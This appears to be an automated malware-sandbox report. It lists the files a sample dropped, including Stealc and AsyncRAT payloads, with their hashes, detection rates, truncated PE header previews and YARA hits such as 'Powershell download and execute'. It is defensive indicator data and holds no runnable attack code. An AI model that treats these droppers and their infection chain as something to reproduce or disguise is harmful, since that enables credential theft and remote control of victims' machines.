SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\runtime[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1146632
Entropy (8bit):	7.959378350578356
Encrypted:	false
SSDEEP:	24576:RvqqvYZAFnc7EtexlphsFHMQSuRoEPmXG1YO:8qvOA1jexlDsoAmXKYO
MD5:	7ADFC6A2E7A5DAA59D291B6E434A59F3
SHA1:	E21EF8BE7B78912BED36121404270E5597A3FE25
SHA-256:	FBB957B3E36BA1DDA0B65986117FD8555041D747810A100B47DA4A90A1DFD693
SHA-512:	30F56BD75FE83E8FB60A816C1A0322BC686863D7AB17A763FFF977A88F5582C356B4FCFE7C0C9E3E5925BFEE7FC44E4EA8B96F82A011ED5E7CD236253187181B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...~...B...8............@......................................@.................................@........................P.......`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\whiteheroin[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	747008
Entropy (8bit):	7.203752584005189
Encrypted:	false
SSDEEP:	12288:AzEx8eyYxSIRuqJ7MJgtgWd89b9X0D2fwDe3RPYyz1UTMLJYYZIjRdBPn2TSUjQN:CEx8qUIRuqJ4JwgCu0D
MD5:	CA0A3F23C4743C84B5978306A4491F6F
SHA1:	58CF2B0555271BADC3802E658569031666CB7D7E
SHA-256:	944113E85A7CF29D41FBBB30F87EA2554D036448A0BDB1E4E2B2ADE3F99A9359
SHA-512:	9767F2AFBE92EDDC46A5654F7F8D6EB10DA305DF5B009D7407BA9822E5D0F9CC374728900E5EBED15E9849F155A77F44D96F16B4BCCA650A42257BDCA7F29CBD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................Z...........y... ........@.. ....................................@.................................Py..K.................................................................................... ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............d..............@..B.................y......H...........8...............................................................$..'.@....I..$O...Uj..>.&O..I..*....J.......R.....Pm.k.JR..9...8....."./%c......W..5yBI....S\..<.:.LH!..2.K..O.5].[O.......d.fpO...g@ip.=......U.-...I..}...K....i..,p.D.<L(A.AZH..8........2.l).....f?...o...e..6E=........T..c....q'.8...(._.}.Ny.r...%M...9.{...;rt.\|..#.......N..8.~.<...q..P.ti....:...c...W.\|nl........"..=zc\|.d{....L.......q.t.?......AF;i}........!4.x....>L.J.v.H.pk.]

C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	330792
Entropy (8bit):	7.984907013196583
Encrypted:	false
SSDEEP:	6144:kImw3mswWc3KcEUffTOR/PmB7ZegrbgykDDCT2qDx0j6ibCMvUkBEO:k+wWcXbwmfXK62qSjPbkkBEO
MD5:	D6FCA3CD57293390CCF9D2BC83662DDA
SHA1:	94496D01AA91E981846299EEAC5631AB8B8C4A93
SHA-256:	74E0BF30C9107FA716920C878521037DB3CA4EEDA5C14D745A2459EB14D1190E
SHA-512:	3990A61000C7DAD33E75CE1CA670F5A7B66C0CE1215997DCCFCA5D4163FEDFC7B736BCA01C2F1064B0C780ECCB039DD0DE6BE001C87399C1D69DA0F456DB2A8E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................@............`.....................................S.......................(&... ......p................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.........................................................................#...t..j. `t-...z.....-....r.N..e.k..MXw..a.bj......#.O...1..$....OU.........]AM...K!].,..Z........w...R...^#.U..(.Q.D}z......m..._.. ".!..z.#.79...y.Y.2......lc...5..>.l...[..W.I.C......9...FkJ..}.X_X."...qP.4...p.X"..d6.&....\...a...]".Tv>.@..GIc.4...P....J..zj.pr.y.r..fH...6.......#.....kqzT+.S....0.A..p.1.....f..\|.P.#.XX..m......+p.:.+...q.....#X...},nh.L.N.'.,..0\|:.r.E.3..%Y..u

C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1104936
Entropy (8bit):	7.998181628509962
Encrypted:	true
SSDEEP:	24576:lxaesWtTVxFP96Hu0jjjfQNggJRhc2BIVTit:3FsWTzqjjW/BV
MD5:	8E74497AFF3B9D2DDB7E7F819DFC69BA
SHA1:	1D18154C206083EAD2D30995CE2847CBEB6CDBC1
SHA-256:	D8E81D9E336EF37A37CAE212E72B6F4EF915DB4B0F2A8DF73EB584BD25F21E66
SHA-512:	9AACC5C130290A72F1087DAA9E79984565CCAB6DBCAD5114BFED0919812B9BA5F8DEE9C37D230EECA4DF3CCA47BA0B355FBF49353E53F10F0EBC266E93F49F97
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f................................. ........@.. ....................... ............`.....................................O.......................(&........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........................................................................L.v.lT.p#.E..'&..@cC...tE.....% ...pr*QA.U.v6..V.=.Cx..G.H.E.....i.....(hh.q.Bf..}...gL-.S.1),p.....$.8.ij3.....7....!Ts......T.[...X..PUE.c.j...s.].E........q.X.wsS.Y....g)......7I...OK..m(..d.(.T........0`.V`...o....E.G...#.I..q.....lh9..+........>6Q..=.S ...........-....#..].......rA.R..........1?.[..}l....jqD.$....N..xE1p....x[.h~.....i..d...u.!x.o..D..yue...S../z..>.\|.!. .0.^.

C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	358912
Entropy (8bit):	5.978721741733768
Encrypted:	false
SSDEEP:	6144:gSVu917CQaNutVHcaOLnysBBPEDcu4jZ21sK0O:gSE91m7WSasBPu6Z2z
MD5:	D78D85135F584E455F692923D9FEB804
SHA1:	7BF6D4D00326ECFA3E48644896D3407AB473A9D5
SHA-256:	41582C8B6BD111A2F141DEE52B619D13278EF68754691263ABEB3238D485F404
SHA-512:	1FB4E040511F3BBF8C04459942D1A5915B5F8FE78DD169B932E04DC7CCDB227AEE42327A8071136B27A368F2FE8B8B5DE3C9187D4B3CC5354CBBA0A1D89D26BB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....W...W...W...W...W...W...W...W...W.W...W...Wh..W...W...W...W...W...W...WRich...W........PE..L....qOd.................\|...,......8E............@..................................k.......................................~..P.... ...............................................................1..@............................................text...6z.......\|.................. ..`.data............v..................@....rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	192000
Entropy (8bit):	6.395265378509869
Encrypted:	false
SSDEEP:	3072:QJlVTFj5qDao8KaxfE54HnnGSail+bOX8bX60UFHJKa:QJP5j5Ka2aOanGSabY860UFpKa
MD5:	7A02AA17200AEAC25A375F290A4B4C95
SHA1:	7CC94CA64268A9A9451FB6B682BE42374AFC22FD
SHA-256:	836799FD760EBA25E15A55C75C50B977945C557065A708317E00F2C8F965339E
SHA-512:	F6EBFE7E087AA354722CEA3FDDD99B1883A862FB92BB5A5A86782EA846A1BFF022AB7DB4397930BCABAA05CB3D817DE3A89331D41A565BC1DA737F2C5E3720B6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L......f.....................B"......d............@..........................0$...........@....................................<.............................#..$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6573502
Entropy (8bit):	6.619875539021286
Encrypted:	false
SSDEEP:	49152:OS/eyZF6znxR9oClho8FKVC/HOXT0je05iMUpU31bY+oTNQ+nJJo3qUssbVL:OS92xvoClSefWXT0je2qXFk6UsspL
MD5:	EE1442544088C8A6AC94E0A849CBCCE2
SHA1:	E66FCD37D0A4ABC6168A15EEC6213B22491DC5F3
SHA-256:	544771F1F73C63161AE6A231FF4EE4A4109882F331D0F8B627CCADCD64C3DD41
SHA-512:	29D662EF64951EA1140E481960B93703F94B69519006B2A214CE8C371290ACCF0C2B4B83B4ED5DB0F05B77309B4A8CD0C4D25EB1635F9A6F8C025297538BA2B5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.D^..$.........#.4G...Y...f..........PG...@.................................ZJe....... .........................B....................................... ..........................$.G....................................................text....3G......4G.................`.P`.data...h....PG......:G.............@.`..rdata..8....pG......NG.............@.`@/4.......y... H..z....G.............@.0@.bss....T.f...K.......................`..edata..B............jK.............@.0@.idata...............lK.............@.0..CRT....4............vK.............@.0..tls.................xK.............@.0..reloc... ......"...zK.............@.0B/14...................Y.............@..B/29..................Y.............@..B/41.....XL.......N...L[.............@..B/55.....B.............[.............@..B/67.....T............~\.............@.0B/80.....a.... ........\.

C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1146632
Entropy (8bit):	7.959378350578356
Encrypted:	false
SSDEEP:	24576:RvqqvYZAFnc7EtexlphsFHMQSuRoEPmXG1YO:8qvOA1jexlDsoAmXKYO
MD5:	7ADFC6A2E7A5DAA59D291B6E434A59F3
SHA1:	E21EF8BE7B78912BED36121404270E5597A3FE25
SHA-256:	FBB957B3E36BA1DDA0B65986117FD8555041D747810A100B47DA4A90A1DFD693
SHA-512:	30F56BD75FE83E8FB60A816C1A0322BC686863D7AB17A763FFF977A88F5582C356B4FCFE7C0C9E3E5925BFEE7FC44E4EA8B96F82A011ED5E7CD236253187181B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...~...B...8............@......................................@.................................@........................P.......`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	114176
Entropy (8bit):	6.520506949765309
Encrypted:	false
SSDEEP:	3072:TULcxmRdWPMV7e9VdQsH1bf8jQBDud7r6GiX8QiQ/avY:TKdWPMV7aesVbcSDudr6SEo
MD5:	C27417453090D3CF9A3884B503D22C49
SHA1:	17938ECE6999BC94D651743063C3F989E38547B4
SHA-256:	D330B3CEC745CE7BF9856E3CDCE277A52FE7AD09874D519FA7B9B080A61A7407
SHA-512:	27D115974702510F9EF7EB841D359764197429ED9D233F98FACEC317FDAA8B4EC4E481103D8B950EE2F10711280E7296457107D928603AF2174B586233ABB443
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c............................N4... ...@....@.. ....................... ............@..................................3..O....@............................................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc..............................@..B................04......H.......Py..........0....................................................W......H3.......W......3........./.\.....{...."..}......{...."..}......{...."..}.....~....(....9.....~....(....(.....(....n~....(....~.....(....(.....r...p.(.....(.....@....(.....A...(....f.~#...}......}.....($.....($....~....%:....&~....../...sM...%.....sN...(O...~....(..........~....o....9 ...~.....(....(G...9....~.....(.....s................s)........~J................s.........r~....o

C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10481152
Entropy (8bit):	6.549113701782075
Encrypted:	false
SSDEEP:	98304:Zk8Moeo9VZ4odf8Fn8U/J1vD3NSPUv3KWQSy+Bk:e8Moeo9VZLf8hvRlfKkhBk
MD5:	304A5A222857D412CDD4EFFBB1EC170E
SHA1:	34924C42524CA8E7FCC1FC604626D9C5F277DBA2
SHA-256:	D67FB52973C445A3488A9D6A9A9FF3EBEBB05B1C0E853CEBFA8BBA1A5953F0D6
SHA-512:	208B39436B520E909EB8262F68314DCB93852EA5F00A1D4CE8BD682DD5E20AD313E65FF293C8062BFED95FFE101F6EAD3D7DA4886E779031101329A3764B855F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......f..........".......]..&B.....`.].......@..............................0.......................@............... ...............`g......pf..P...0q.../..@l.0.............g...............................g.(....................f.......f.F....................text.....].......]................. ..`.data.........].......].............@....bss....,.....e..........................idata...P...pf..R...ze.............@....didata.F.....f.......e.............@....edata.......`g......\f.............@..@.tls.........pg..........................rdata..m.....g......^f.............@..@.reloc........g......`f.............@..B.pdata..0....@l.......k.............@..@.rsrc...../..0q.../...o.............@..@.............0.....................@..@

C:\Users\user\AppData\Local\Temp\1000192001\whiteheroin.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	747008
Entropy (8bit):	7.203752584005189
Encrypted:	false
SSDEEP:	12288:AzEx8eyYxSIRuqJ7MJgtgWd89b9X0D2fwDe3RPYyz1UTMLJYYZIjRdBPn2TSUjQN:CEx8qUIRuqJ4JwgCu0D
MD5:	CA0A3F23C4743C84B5978306A4491F6F
SHA1:	58CF2B0555271BADC3802E658569031666CB7D7E
SHA-256:	944113E85A7CF29D41FBBB30F87EA2554D036448A0BDB1E4E2B2ADE3F99A9359
SHA-512:	9767F2AFBE92EDDC46A5654F7F8D6EB10DA305DF5B009D7407BA9822E5D0F9CC374728900E5EBED15E9849F155A77F44D96F16B4BCCA650A42257BDCA7F29CBD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................Z...........y... ........@.. ....................................@.................................Py..K.................................................................................... ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............d..............@..B.................y......H...........8...............................................................$..'.@....I..$O...Uj..>.&O..I..*....J.......R.....Pm.k.JR..9...8....."./%c......W..5yBI....S\..<.:.LH!..2.K..O.5].[O.......d.fpO...g@ip.=......U.-...I..}...K....i..,p.D.<L(A.AZH..8........2.l).....f?...o...e..6E=........T..c....q'.8...(._.}.Ny.r...%M...9.{...;rt.\|..#.......N..8.~.<...q..P.ti....:...c...W.\|nl........"..=zc\|.d{....L.......q.t.?......AF;i}........!4.x....>L.J.v.H.pk.]

C:\Users\user\AppData\Local\Temp\40365\Beijing.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\40365\s

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	567927
Entropy (8bit):	7.999675029210566
Encrypted:	true
SSDEEP:	12288:5kdTEt7IAC8do9FExcbF22ALkjQRjFHwFjPiRJnPFTFcUzeyF:mluEUAFgcjRsFHwVqD/ee
MD5:	30AB54AE1C615436D881FC336C264FEF
SHA1:	7E2A049923D49AE5859D2A0AA3A7DD092E672BD1
SHA-256:	FF64AE2A70B07EBA7678241A8FA20F3569A03CC5CDC087306A4451ACD97EE2DB
SHA-512:	1AF06FD6D67C59DF3A32FBC4C12E8788F5E3B46A1CA2E1DDC8BC9926D1BACB0B702F2D88E950FC04145D3B904E60E8910ACF6FC0F87BD676459B10FC25707BE9
Malicious:	false
Preview:	a...J.Q.91..`.X...f..%.L.3.W.\p.h.T..)...O.h.rs.M.v.~f.;q..Fd......#.[.....G......s.~....4...{...^om>\.......p/.S....x.`q..Z>C.b'Y.H......X..KaM......1....J/x.C......o...4I.....8.....O&....L..e......V.z..x..T..O.8H...$..(O....,{}D.b....T.j....a..._...QE....()a........G.'R.N.7H..c.......l9A.......t.".].).P{Z...y...}..!.R....`...BC.@._]..yi..b.%J.q...R..X{....eS.gNg{. wK..A@.Yc..Q.dYTap....<.P.n..j..f..?.f."=\|.f..A.....>x......3x.....".pR...NK#a.[.......f.v.7.I..i..2_~.Pf.p.V..G..(.-....x..u#~~p.....;7>.....y:\|.X..-8....B...W..p.....#.]....s.D.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....E.N.'.F...h.............~....=..~....=..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Download File

Process:	C:\Users\user\Desktop\PQ2AUndsdb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1901056
Entropy (8bit):	7.949409711445707
Encrypted:	false
SSDEEP:	49152:GuuQGYpXc8ui/IepABEY1zbha5LKj5oBXI9M7+ORHA:nubKtui/rABXha5LKmIIRg
MD5:	3D299133A21509BB0B005F7E18239517
SHA1:	9E9E464145F6208A62BC01A42568DBC259AFBD50
SHA-256:	F7B78FC6239775C67933713A1E65570E9BE12C8B72A3225600112E4E40A81958
SHA-512:	791CB24B622ED6EECE262CBBE0C6594FF6FF2A7EC3BE26D7201F260BC758378C898F9BABB0657E2301FA40072BFF9EB8A3958D5E7C43C37577F3B1B61A2D01CF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................0K...........@..........................`K.....i?....@.................................W...k.............................K.............................p.K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...rxawdntq.....01.....................@...tdrtfhuo..... K.....................@....taggant.0...0K.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\PQ2AUndsdb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\Continue

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	32375
Entropy (8bit):	7.993173641150126
Encrypted:	true
SSDEEP:	768:vzso+XZDvXwh7WaHnsAdKppiQljFTU6cOHd3:LsFBXc7WaMYQpiQljRN
MD5:	6184A8FC79D602BC18C0BADB08598580
SHA1:	DE3A273E7020D43729044E41272C301118CC3641
SHA-256:	A8181F349864C6C9A216935894392B75D0D1430D43A255FF3A9AD56C325487E7
SHA-512:	41687B30ECD957EB1B6D332133F1C1D7E01CC1C8BF56526DFA20DE3937ED549133E93872380E3B51B63B33134C62D4DF91C7E08E908CA18B3E6F9D52E89378CB
Malicious:	false
Preview:	.....V..iYlf..R.I....<."G.$.M>.....R.....+:........i......O..js.z..w..F....j.wO8...`....;...}u.'k...b..b...@.d.<..1.S...H....o.....Bw.J.".M..6........,.:vD..hK.hh..s.e.$.@.(.,P......?.=...Yaa.r...:..V ..o.6.......O.~..\/..... m..0@.J..x(..X,.....CU...y.-.J:V7...}.=..8.]KYn.b^..^.s............8.&.\k.o.!G.O9.M..=9...O.q/..j...>..1..uY..3..bR.x...%S...J.....W.`..2~..m..GV....4.+....e.8...4.t.rp1b.!.u.K.)My..5F.....h._@.6}Q@.v,.&..U.H.....J)...I.%tG...(R..._..A..4.bFB.d1"V... ..v....c..../\.)_...nD!.T...,....z..+.5..Q.;...x.........<.e.%..........^...ye}QF\|....@;.5....v.v.^oG...9..t...].A.4ZR....nPf...F....B.......9....UafIm.z........A.m.Y.c.. .K.3.+9.=Kr.<.X..i.<.X......]k....e7....a..../.zd.2.@..U..~.9..b...k..B..Pu...~...@..Yw"YZ`..s^.j)..$.x.")XQ!..z.DQ..B.2...T.e.,..qP.9N}..x.=.q.g.....x..e@_....;.8m'.._....6..1..u...3...l..R.Y...o.K.H...E;.6.K...x.{]:h.;U...MY.....ah....i.4.\|`......F.b.'..Jx.,..7.K\g.s......M..Rm....,W.'...+4.

C:\Users\user\AppData\Local\Temp\Continues

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe
File Type:	ASCII text, with very long lines (779), with CRLF line terminators
Category:	dropped
Size (bytes):	14996
Entropy (8bit):	5.067627639870129
Encrypted:	false
SSDEEP:	384:eVBYHob1k4dljIDMob5chIukwWXVU9/b16+atFkjPom:eR1k4HjIJa1OVa/b16+atAPom
MD5:	2226738A67DA04CEF580C99F70B9A514
SHA1:	48BBFBFDCE94231EBC1833B87FF6E79AA716E3B4
SHA-256:	E04A1B86CE1A5352F7C3A5DDB8B500993F4342EF4E188ED156009E5271795AF1
SHA-512:	C653AAFD3AA2D320EEF1D5B9CF9E58372E778C41147C3D85BCB6E231C8703D19F410EBB2F58F2A9F0671F027FCE2BAEEEC70252E926BB9880128BA6DCEDFDB08
Malicious:	false
